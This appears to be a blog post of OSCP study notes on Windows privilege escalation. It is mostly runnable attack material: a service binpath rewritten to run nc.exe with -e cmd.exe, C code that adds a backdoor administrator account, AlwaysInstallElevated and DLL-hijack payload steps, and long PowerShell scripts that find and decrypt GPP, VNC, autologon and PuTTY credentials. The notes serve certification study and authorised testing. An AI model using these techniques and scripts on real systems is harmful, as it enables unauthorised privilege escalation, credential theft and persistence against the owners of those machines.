SECURISM
All about Information Security

OSCP NOTES – PRIVILEGE ESCALATION (WINDOWS)

USEFUL RESOURCES

http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://toshellandback.com/2015/11/24/ms-priv-esc/

WATCH YOUTUBE VIDEOS

http://www.youtube.com/watch?v=kMG8IsCohHA
http://www.youtube.com/watch?v=_8xJaaQlpBo

http://www.greyhathacker.net/?p=738

WINDOWS EXPLOIT SUGGESTER

https://github.com/GDSSecurity/Windows-Exploit-Suggester

python /home/nikhil/scripts/windows-exploit-suggester.py -d 2016-07-02-mssb.xls -i systeminfo -l

-d : the Microsoft security bulletin spreadsheet, fetched beforehand with --update (the date in the file name is the day it was downloaded)
-i : the systeminfo file, i.e. the plain ASCII output of the 'systeminfo' command run on the Windows target (the tool reads the installed hotfix list from it)
-l : show only local (privilege escalation) exploits

Caveat: the suggester only knows about bulletins present in the spreadsheet, so a "missing" hotfix is a lead to verify against the actual OS build, not proof that the box is vulnerable.
https://www.exploit-db.com/docs/26000.pdf

WINDOWS ADMINISTRATOR TO SYSTEM

psexec.exe -accepteula -i -s -d cmd.exe

-s runs the process as the local SYSTEM account, -i makes it interactive on the current desktop and -d returns without waiting for it to exit. PsExec installs a temporary service to do this, so it needs an existing administrator token: this is the admin-to-SYSTEM step, not a privilege escalation on its own.

https://blogs.technet.microsoft.com/askds/2008/10/22/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008/
http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html

ADD ADMIN USER ACCOUNT

net user /add [username] [password]
net localgroup administrators [username] /add

Compile the following C code into an exe to add an admin user account (e.g. cross-compile on Kali with MinGW). It only does anything useful when run in a context that is already an administrator or SYSTEM, for example from a service binpath you can modify or from an AlwaysInstallElevated MSI.

#include <stdlib.h>

int main(void)
{
    int i;

    /* same two commands as above: create the user, then put it in the local Administrators group */
    i = system("net user /add ashoka qwerty");
    i = system("net localgroup administrators ashoka /add");

    return 0;
}

WINDOWS PRIV ESCALATION INFO GATHER

windows-privesc-check2.exe

windows-privesc-check2.exe --audit -a -o wpc-report

--audit runs the checks, -a selects all of them and -o sets the prefix of the report files it writes. Run it from a directory you can write to; the report is what you grep for writable service binaries, directories and registry keys.

wmic_info.bat
BASIC COMMANDS

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
echo %username%
net users
net user user1

If the user is in the Power Users group, refer to https://blogs.technet.microsoft.com/markrussinovich/2006/05/01/the-power-in-power-users/ (on XP/2003 the group is effectively admin-equivalent; from Vista on it has no special rights by default).

net view
net user /domain
echo %logonserver%
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config
(netsh firewall is deprecated; on Vista and later use netsh advfirewall show allprofiles)
schtasks /query /fo LIST /v
tasklist /SVC
net start          (lists the running Windows services)
DRIVERQUERY

Search for file names

dir /s *pass* == *cred* == *vnc* == *.config*

Search within files (/s recurses from the current directory, /i ignores case; run it from C:\ and from the web root)

findstr /si pass *.xml *.ini *.txt *.config *.cfg *.bat
findstr /si pwd *.xml *.ini *.txt *.config *.cfg *.bat

Search the registry

reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f pwd /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

SEARCH FOR SENSITIVE FILES

dir sysprep.inf /s
dir sysprep.xml /s
dir Unattended.xml /s

WHEN MACHINE ON DOMAIN (GROUP POLICY PREFERENCE GPP)

Search for Groups.xml in SYSVOL: its cpassword attribute holds an account password encrypted with AES-256, but the key is public (Microsoft published it in the MS-GPPREF documentation), so the value is effectively cleartext. Any domain user can read SYSVOL.

Metasploit module for extracting it: post/windows/gather/credentials/gpp

C:\Windows\SYSVOL\sysvol
C:\ProgramData\Microsoft\Group Policy\History
These are the two paths the Metasploit module above searches: the first only exists on a domain controller, the second is the local GPP cache on any domain member (from a workstation use \\<domain>\SYSVOL).

Encryption key: https://msdn.microsoft.com/en-us/library/Cc422924.aspx

MS14-025 stopped Windows from writing new cpassword values, but it does not remove existing ones, so old preference files are still worth checking. On Kali, gpp-decrypt <cpassword> decrypts a value found by hand.

Good resource on this topic: http://www.toshellandback.com/2015/08/30/gpp/
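As an added example (not from the original notes and not the Metasploit module's code), the same search and decryption in PowerShell, runnable from any domain member. The function names, the SYSVOL UNC path built from USERDNSDOMAIN and the list of preference files beyond Groups.xml are my own assumptions:

```powershell
# Added example, not part of the original notes: search SYSVOL / the local GPP
# cache for cpassword attributes and decrypt them with the published key.
# Assumes PowerShell 3+ on a domain-joined host; function names are my own.

function ConvertFrom-GppCPassword {
    param([Parameter(Mandatory)][string]$CPassword)

    # AES-256 key from the MS-GPPREF documentation (the MSDN link above).
    $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

    # cpassword is base64 with the trailing '=' padding stripped; restore it.
    $b64 = $CPassword
    while ($b64.Length % 4 -ne 0) { $b64 += '=' }
    $cipherBytes = [Convert]::FromBase64String($b64)

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key     = $key
    $aes.IV      = New-Object byte[] 16      # GPP uses an all-zero IV
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipherBytes, 0, $cipherBytes.Length)

    # The decrypted password is UTF-16LE.
    [System.Text.Encoding]::Unicode.GetString($plain)
}

function Find-GppPassword {
    param(
        # Assumed search roots: the domain's SYSVOL share and the local GPP
        # history cache (the second path is the one the notes list).
        [string[]]$SearchRoot = @("\\$env:USERDNSDOMAIN\SYSVOL",
                                  "$env:ProgramData\Microsoft\Group Policy\History")
    )
    # Groups.xml is the classic location; the other preference files can carry cpassword too.
    $names = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'

    foreach ($root in $SearchRoot) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $files = Get-ChildItem -Path $root -Recurse -Include $names -File -ErrorAction SilentlyContinue
        foreach ($f in $files) {
            try { [xml]$xml = Get-Content -LiteralPath $f.FullName -Raw -ErrorAction Stop } catch { continue }
            # Every element carrying a cpassword attribute holds one encrypted credential.
            foreach ($node in $xml.SelectNodes('//*[@cpassword]')) {
                $cp = $node.GetAttribute('cpassword')
                if ([string]::IsNullOrEmpty($cp)) { continue }
                # The attribute naming the account differs per preference type.
                $account = $null
                foreach ($attr in 'userName','accountName','runAs','name') {
                    if ($node.HasAttribute($attr)) { $account = $node.GetAttribute($attr); break }
                }
                [pscustomobject]@{
                    File     = $f.FullName
                    Account  = $account
                    NewName  = $node.GetAttribute('newName')
                    Password = ConvertFrom-GppCPassword -CPassword $cp
                    Changed  = $node.ParentNode.GetAttribute('changed')
                }
            }
        }
    }
}

# Usage on a domain member:
#   Find-GppPassword | Format-List
#   ConvertFrom-GppCPassword -CPassword '<value copied from a Groups.xml>'
```

The Changed timestamp comes from the parent element and tells you how old the credential is; a very old entry often belongs to an account that has since been reset, so check it with a logon attempt before building on it.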

INSTALL *.MSI AS SYSTEM IF

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

Both queries must return AlwaysInstallElevated REG_DWORD 0x1; the keys are usually missing altogether, which means the policy is off. When both are set, any .msi a user runs is installed by the Windows Installer service as SYSTEM, so an MSI that runs the add-user commands above (e.g. msfvenom -f msi) escalates directly.

WINDOWS SERVICES

Info on a service

sc qc <service name>

Prevents pop ups to the user (accept the Sysinternals EULA non-interactively):

accesschk.exe /accepteula

Use accesschk 5.2 if 6.0 doesn't work (the older build still runs on XP/2003)

Access permissions on a specific service

accesschk.exe -ucqv <service name>

Access permissions for a specific group on all services (-w = only show write-type access)

accesschk.exe -uwcqv "Authenticated Users" *

Look for the following permissions on a service for a group you are a member of (Users, Authenticated Users, Everyone): SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE or GENERIC_ALL. SERVICE_CHANGE_CONFIG is enough to change the binpath with sc config (next section); WRITE_DAC and WRITE_OWNER let you grant yourself that right first. SERVICE_START / SERVICE_STOP on their own only matter once you can also change what the service runs.
MODIFYING VULNERABLE SERVICES

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

Note the space after each '=' (binpath= "..."): sc requires it. obj= ".\LocalSystem" makes the service run as SYSTEM if it did not already; if that change is denied, the new binpath still runs as whatever account sc qc shows under SERVICE_START_NAME. The new binpath is not a real service executable, so the service controller kills it after about 30 seconds with error 1053; a reverse shell or the add-user commands above complete in time, an interactive prompt does not. Stop the service first (sc stop upnphost) if it is already running, and restore the original binpath afterwards.

FILES/FOLDER PERMISSIONS

http://www.greyhathacker.net/?p=738
1. Examine ALL the binpaths of the Windows services, scheduled tasks and startup tasks.
2. Look for files/folders whose permissions let you change them (write on the binary itself, or write on its directory, which also allows renaming and replacing it).
3. Replace the binaries/DLLs if possible, then wait for or trigger the service, task or reboot that runs them.

Find all weak folder permissions per drive (-w write access only, -d directories only, -s recurse, -q quiet, -u suppress errors):

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

Find all weak file permissions per drive:

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

Find weak permissions via cacls or icacls (look for F or C with cacls, (F), (M) or (W) with icacls, granted to a group you are in):

cacls "C:\Program Files" /T | findstr Users

or

icacls "C:\Program Files" /T | findstr Users

DLL HIJACKING

Works when a service (or any process running as a more privileged account) tries to load a DLL that does not exist on the system, or that exists only in a directory later in the search order than one you can write to. But how to identify which services do that? Run the same service in a test environment and use Sysinternals procmon (filter on Result is NAME NOT FOUND and Path ends with .dll) to see which DLLs are requested and from where. DLL redirection could also be used. https://msdn.microsoft.com/en-us/library/windows/desktop/ms682600(v=vs.85).aspx

The DLL search order on 32-bit systems (with SafeDllSearchMode on, the default) is:
1 - The directory from which the application loaded        No access as limited user
2 - 32-bit System directory (C:\Windows\System32)           No access as limited user
3 - 16-bit System directory (C:\Windows\System)             No access as limited user
4 - Windows directory (C:\Windows)                          No access as limited user
5 - The current working directory (CWD)                     NA
6 - Directories in the PATH environment variable (system then user)

So the realistic targets are a writable directory in the system PATH (6), which is common when third-party software such as Python or Perl adds itself to PATH with loose permissions, and occasionally the application directory (1) of a third-party service installed outside Program Files.

Check permissions on the directories in the PATH environment variable:

echo %PATH%
accesschk.exe -dqv "C:\Python27"
sc qc <service name>          (shows the binpath, i.e. the application directory searched first)

Generate the DLL payload with msfvenom (-f dll), name it after the missing DLL, drop it in the writable directory and restart the service or wait for the next boot.
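As an added example serving both the files/folder permissions steps above (service binpaths and their directories) and the PATH check for DLL hijacking, the following PowerShell does the same enumeration that the accesschk commands do but evaluated against the current token's own SIDs. It is not from the original notes; the function names are my own, and it assumes PowerShell 3 or later:

```powershell
# Added example, not part of the original notes: list service binaries, their
# directories and PATH entries that the current token can write to. Assumes
# PowerShell 3+; function names are my own. Confirm any hit with icacls, since
# Deny ACEs are not evaluated here.

function Get-CurrentTokenSids {
    # The user SID plus every group SID in the token (BUILTIN\Users,
    # NT AUTHORITY\Authenticated Users, Everyone, ...); a match on any of them
    # means the ACE applies to us.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Test-WritableByCurrentUser {
    param([Parameter(Mandatory)][string]$Path,
          [string[]]$Sids = (Get-CurrentTokenSids))
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }

    # Specific rights that allow replacing the file or dropping a file into the
    # directory, plus the GENERIC_WRITE / GENERIC_ALL bits some installers leave behind.
    $specific = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'
    $generic  = 0x40000000 -bor 0x10000000
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # unresolvable (deleted) account: skip
        if (($Sids -contains $sid) -and (([int]$ace.FileSystemRights -band ($specific -bor $generic)) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Get-WritableServiceTarget {
    # Steps 1 and 2 above: every service binpath, then the binary and its folder.
    $sids = Get-CurrentTokenSids
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $binpath = $svc.PathName
        if (-not $binpath) { continue }
        # Pull the executable out of the binpath: quoted path, else first token ending in .exe.
        if     ($binpath -match '^"([^"]+)"')  { $exe = $Matches[1] }
        elseif ($binpath -match '^(.+?\.exe)') { $exe = $Matches[1] }
        else                                   { $exe = ($binpath -split ' ')[0] }
        $dir = Split-Path -Path $exe -Parent
        foreach ($target in @($exe, $dir)) {
            if ($target -and (Test-WritableByCurrentUser -Path $target -Sids $sids)) {
                [pscustomobject]@{
                    Service  = $svc.Name
                    RunsAs   = $svc.StartName
                    Start    = $svc.StartMode
                    Writable = $target
                    BinPath  = $binpath
                    # Unquoted path containing spaces: also the classic path-interception case.
                    Unquoted = ($binpath -notmatch '^"') -and ($exe -match ' ')
                }
            }
        }
    }
}

function Get-WritablePathDirectory {
    # Entry 6 of the DLL search order: PATH directories the current user can write to.
    $sids = Get-CurrentTokenSids
    foreach ($dir in ($env:PATH -split ';' | Where-Object { $_ })) {
        if (Test-WritableByCurrentUser -Path $dir -Sids $sids) {
            [pscustomobject]@{ Directory = $dir }
        }
    }
}

# Usage:
#   Get-WritableServiceTarget | Format-Table -AutoSize
#   Get-WritablePathDirectory
```

A hit on the binary means replacing it; a hit on only the directory means renaming the original and dropping your own in its place, or planting the missing DLL found with procmon. Either way the RunsAs column tells you what you get when the service restarts.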

VNC STORED

reg query "HKCU\Software\ORL\WinVNC3" /v Password
(Password is a value, not a key, hence /v. It is an 8-byte REG_BINARY obfuscated with a fixed DES key rather than plaintext; decode it with a VNC password decoder such as vncpwd.)

WINDOWS AUTOLOGIN:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
(look at AutoAdminLogon, DefaultUserName, DefaultDomainName and DefaultPassword; when DefaultPassword is present it is stored in clear)

SNMP PARAMETERS:

reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
(community strings are the value names under Parameters\ValidCommunities; allowed managers are under Parameters\PermittedManagers)

PUTTY CLEAR TEXT PROXY CREDENTIALS:

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
(ProxyUsername and ProxyPassword are stored in clear per saved session; HostName and UserName tell you where they are used)
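As an added example (not from the original notes), a PowerShell routine that reads the locations the four registry queries above point at and decodes the VNC value, which is the only one that is not stored in clear. The function names, the RealVNC/TightVNC key paths and the bit-reversed DES key are my assumptions, labelled as such in the code:

```powershell
# Added example, not part of the original notes: read the stored credentials the
# registry queries above point at and decode the VNC one, which is DES-obfuscated
# with a fixed key rather than stored in clear. Assumes PowerShell 3+ and read
# access to the keys; function names and the RealVNC/TightVNC key paths are my own.

function ConvertFrom-VncPassword {
    param([Parameter(Mandatory)][byte[]]$Encrypted)   # the REG_BINARY Password value
    # VNC's d3des uses the key bytes 23,82,107,6,35,78,88,7 with the bits of each
    # byte read in reverse order; for a standard DES implementation that is the
    # bit-reversed key below. (Assumption to confirm on a live sample: if the
    # result is garbage, try the un-reversed bytes 0x17,0x52,0x6B,0x06,0x23,0x4E,0x58,0x07.)
    $key = [byte[]](0xE8,0x4A,0xD6,0x60,0xC4,0x72,0x1A,0xE0)
    if ($Encrypted.Length -lt 8) { return $null }
    $des = [System.Security.Cryptography.DES]::Create()
    $des.Key     = $key
    $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB
    $des.Padding = [System.Security.Cryptography.PaddingMode]::None
    $plain = $des.CreateDecryptor().TransformFinalBlock($Encrypted, 0, 8)
    # Passwords are at most 8 ASCII characters, NUL padded.
    [System.Text.Encoding]::ASCII.GetString($plain).TrimEnd([char]0)
}

function Get-RegistryStoredCredential {
    $out = @()

    # Autologon: DefaultPassword is in clear when AutoAdminLogon is 1 (if it is
    # missing, the password may live in the LSA secret of the same name instead).
    $wl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    if ($wl -and $wl.DefaultPassword) {
        $out += [pscustomobject]@{ Source = 'Winlogon'; Name = "$($wl.DefaultDomainName)\$($wl.DefaultUserName)"; Secret = $wl.DefaultPassword }
    }

    # SNMP: each value name under ValidCommunities is a community string.
    $snmp = Get-Item -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities' -ErrorAction SilentlyContinue
    if ($snmp) {
        foreach ($c in $snmp.GetValueNames()) { $out += [pscustomobject]@{ Source = 'SNMP'; Name = 'community'; Secret = $c } }
    }

    # PuTTY: proxy credentials are saved in clear per session.
    foreach ($s in (Get-ChildItem -Path 'HKCU:\Software\SimonTatham\PuTTY\Sessions' -ErrorAction SilentlyContinue)) {
        $p = Get-ItemProperty -Path $s.PSPath
        if ($p.ProxyPassword) {
            $out += [pscustomobject]@{ Source = "PuTTY session $($s.PSChildName)"; Name = "$($p.ProxyUsername)@$($p.ProxyHost)"; Secret = $p.ProxyPassword }
        }
    }

    # VNC: WinVNC3 (from the notes) plus the RealVNC 4 and TightVNC server keys (assumed layouts).
    $vncKeys = 'HKCU:\Software\ORL\WinVNC3', 'HKLM:\SOFTWARE\ORL\WinVNC3\Default',
               'HKLM:\SOFTWARE\RealVNC\WinVNC4', 'HKLM:\SOFTWARE\TightVNC\Server'
    foreach ($k in $vncKeys) {
        $v = Get-ItemProperty -Path $k -Name Password -ErrorAction SilentlyContinue
        if ($v -and ($v.Password -is [byte[]])) {
            $out += [pscustomobject]@{ Source = $k; Name = 'Password'; Secret = (ConvertFrom-VncPassword -Encrypted $v.Password) }
        }
    }
    $out
}

# Usage:
#   Get-RegistryStoredCredential | Format-Table -AutoSize
```

The HKLM VNC and SNMP keys are readable by ordinary users on most installs, so this runs before you have any elevated access; the recovered passwords are then reuse candidates against local accounts, the domain and the VNC service itself.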

PASSWORD RECOVERY TOOLS

http://www.nirsoft.net/

SHATTER ATTACK

For Windows NT 4.0, 2000 and XP only (mitigated from Vista on by UIPI, so only relevant on legacy boxes)


https://en.wikipedia.org/wiki/Shatter_attack
http://www.hpl.hp.com/techreports/2005/HPL-2005-87.pdf

SCHEDULED TASKS

schtasks /query /fo LIST /v

Find a task pointing to an insecure location: for every task whose "Run As User" is SYSTEM or another privileged account, check the "Task To Run" path with the accesschk/icacls checks above. If the file or its directory is writable, replace it and wait for the "Next Run Time".

ORPHANED INSTALLS

Missing files in writable locations, i.e. a service, scheduled task or autorun entry still points at a binary that was uninstalled, and the directory it lived in (or a parent directory) can be written to. But how to identify orphaned installs? Run the binpath checks above and look for paths that no longer exist: sc qc and schtasks still show the path even when the file is gone, and a writable parent lets you recreate it.
